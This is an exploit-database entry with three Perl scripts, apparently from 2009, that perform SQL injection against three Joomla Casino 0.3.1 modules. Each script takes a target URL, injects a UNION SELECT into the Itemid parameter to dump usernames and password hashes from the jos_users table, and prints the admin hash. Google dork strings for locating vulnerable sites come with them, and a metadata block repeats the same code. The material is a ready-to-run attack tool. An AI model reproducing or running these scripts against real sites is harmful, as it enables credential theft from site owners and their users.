ID 1337DAY-ID-5214
Type zdt
Reporter ByALBAYX
Modified 2009-05-20T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================
Joomla Casino 0.3.1 Multiple SQL Injection Exploits
===================================================
#!/usr/bin/perl -w
########################################
#[~] Author : ByALBAYX
########################################
#[!] Modul : com_casino_blackjack
#[!] Dork : inurl:"com_casino_blackjack"
########################################
system("color FF0000");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t | C4TEAM | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t |Joomla Module com_casino_blackjack SQL Inj Vuln| \n\n";
print "\t\t | ByALBAYX | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nSite/Path:[http://wwww.c4team.org/Path/]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,0x3a,password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit Calisti #\n\n";
}
else{print "\n[-] Hash Bulunamady...\n";
}
###################################################################
#!/usr/bin/perl -w
########################################
#[~] Author : ByALBAYX
########################################
#[!] Modul : com_casinobase
#[!] Dork : inurl:"com_casinobase"
########################################
system("color FF0000");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t | C4TEAM | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t |Joomla Module Com_Casinobas SQL Inj Vuln| \n\n";
print "\t\t | ByALBAYX | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nSite/Path:[http://wwww.c4team.org/Path/]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,0x3a,password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_casinobase&Itemid=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit Calisti #\n\n";
}
else{print "\n[-] Hash Bulunamady...\n";
}
###################################################################
#!/usr/bin/perl -w
########################################
#[~] Author : ByALBAYX
########################################
#[!] Modul : com_casino_videopoker
#[!] Dork : inurl:"com_casino_videopoker"
########################################
system("color FF0000");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t | C4TEAM | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t |Joomla Module com_casino_videopoker SQL Inj Vuln| \n\n";
print "\t\t | ByALBAYX | \n\n";
print "\t\t-------------------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nSite/Path:[http://wwww.c4team.org/Path/]: ";
chomp(my $target=<STDIN>);
$column_name="concat(username,0x3a,password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_casino_videopoker&Itemid=1+AND+1=2+UNION+SELECT+".$column_name.",1,2+from/**/".$table_name."--";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit Calisti #\n\n";
}
else{print "\n[-] Hash Bulunamady...\n";
}
# 0day.today [2018-02-20] #
{"published": "2009-05-20T00:00:00", "id": "1337DAY-ID-5214", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2018-02-21T01:33:54", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["GENTOO_GLSA-201612-11.NASL", "FEDORA_2016-A815B7BF5D.NASL", "FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "OPENSUSE-2016-1453.NASL", "FEDORA_2017-C5B2C9A435.NASL", "FEDORA_2017-AE1FDE5FB8.NASL", "REDHAT-RHSA-2016-2919.NASL", "FEDORA_2016-E0E1CB2B2B.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810229", "OPENVAS:1361412562310872576", "OPENVAS:1361412562310851453", "OPENVAS:1361412562310872151", "OPENVAS:1361412562310810230", "OPENVAS:1361412562310810228", "OPENVAS:1361412562310872153"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:3108-1", "OPENSUSE-SU-2017:0563-1"]}, {"type": "redhat", "idList": ["RHSA-2016:2919"]}, {"type": "gentoo", "idList": ["GLSA-201612-11"]}, {"type": "archlinux", "idList": ["ASA-201612-3"]}], "modified": "2018-02-21T01:33:54", "rev": 2}, "vulnersScore": 2.8}, "type": "zdt", "lastseen": "2018-02-21T01:33:54", "edition": 2, "title": "Joomla Casino 0.3.1 Multiple SQL Injection Exploits", "href": "https://0day.today/exploit/description/5214", "modified": "2009-05-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/5214", "references": [], "reporter": "ByALBAYX", "sourceData": "===================================================\r\nJoomla Casino 0.3.1 Multiple SQL Injection Exploits\r\n===================================================\r\n\r\n\r\n#!/usr/bin/perl -w\r\n\r\n\r\n########################################\r\n#[~] Author : ByALBAYX\r\n########################################\r\n#[!] Modul : com_casino_blackjack\r\n#[!] Dork : inurl:\"com_casino_blackjack\"\r\n########################################\r\n\r\n\r\nsystem(\"color FF0000\");\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t | C4TEAM | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t |Joomla Module com_casino_blackjack SQL Inj Vuln| \\n\\n\";\r\nprint \"\\t\\t | ByALBAYX | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\n\r\nuse LWP::UserAgent;\r\n\r\nprint \"\\nSite/Path:[http://wwww.c4team.org/Path/]: \";\r\nchomp(my $target=<STDIN>);\r\n\r\n$column_name=\"concat(username,0x3a,password)\";\r\n$table_name=\"jos_users\";\r\n\r\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n\r\n$host = $target . \"/index.php?option=com_casino_blackjack&game_mode=Blackjack&shuffle=1&Itemid=1+AND+1=2+UNION+SELECT+\".$column_name.\",1,2+from/**/\".$table_name.\"--\";\r\n$res = $b->request(HTTP::Request->new(GET=>$host));\r\n$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){\r\nprint \"\\n[+] Admin Hash : $1\\n\\n\";\r\nprint \"# Exploit Calisti #\\n\\n\";\r\n}\r\nelse{print \"\\n[-] Hash Bulunamady...\\n\";\r\n}\r\n\r\n###################################################################\r\n\r\n#!/usr/bin/perl -w\r\n\r\n\r\n########################################\r\n#[~] Author : ByALBAYX\r\n########################################\r\n#[!] Modul : com_casinobase\r\n#[!] Dork : inurl:\"com_casinobase\"\r\n########################################\r\n\r\n\r\nsystem(\"color FF0000\");\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t | C4TEAM | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t |Joomla Module Com_Casinobas SQL Inj Vuln| \\n\\n\";\r\nprint \"\\t\\t | ByALBAYX | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\n\r\nuse LWP::UserAgent;\r\n\r\nprint \"\\nSite/Path:[http://wwww.c4team.org/Path/]: \";\r\nchomp(my $target=<STDIN>);\r\n\r\n$column_name=\"concat(username,0x3a,password)\";\r\n$table_name=\"jos_users\";\r\n\r\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n\r\n$host = $target . \"/index.php?option=com_casinobase&Itemid=1+AND+1=2+UNION+SELECT+\".$column_name.\",1,2+from/**/\".$table_name.\"--\";\r\n$res = $b->request(HTTP::Request->new(GET=>$host));\r\n$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){\r\nprint \"\\n[+] Admin Hash : $1\\n\\n\";\r\nprint \"# Exploit Calisti #\\n\\n\";\r\n}\r\nelse{print \"\\n[-] Hash Bulunamady...\\n\";\r\n}\r\n\r\n###################################################################\r\n\r\n#!/usr/bin/perl -w\r\n\r\n\r\n########################################\r\n#[~] Author : ByALBAYX\r\n########################################\r\n#[!] Modul : com_casino_videopoker\r\n#[!] Dork : inurl:\"com_casino_videopoker\"\r\n########################################\r\n\r\n\r\nsystem(\"color FF0000\");\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t | C4TEAM | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\nprint \"\\t\\t |Joomla Module com_casino_videopoker SQL Inj Vuln| \\n\\n\";\r\nprint \"\\t\\t | ByALBAYX | \\n\\n\";\r\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\r\n\r\nuse LWP::UserAgent;\r\n\r\nprint \"\\nSite/Path:[http://wwww.c4team.org/Path/]: \";\r\nchomp(my $target=<STDIN>);\r\n\r\n$column_name=\"concat(username,0x3a,password)\";\r\n$table_name=\"jos_users\";\r\n\r\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n\r\n$host = $target . \"/index.php?option=com_casino_videopoker&Itemid=1+AND+1=2+UNION+SELECT+\".$column_name.\",1,2+from/**/\".$table_name.\"--\";\r\n$res = $b->request(HTTP::Request->new(GET=>$host));\r\n$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){\r\nprint \"\\n[+] Admin Hash : $1\\n\\n\";\r\nprint \"# Exploit Calisti #\\n\\n\";\r\n}\r\nelse{print \"\\n[-] Hash Bulunamady...\\n\";\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-20] #"}
{}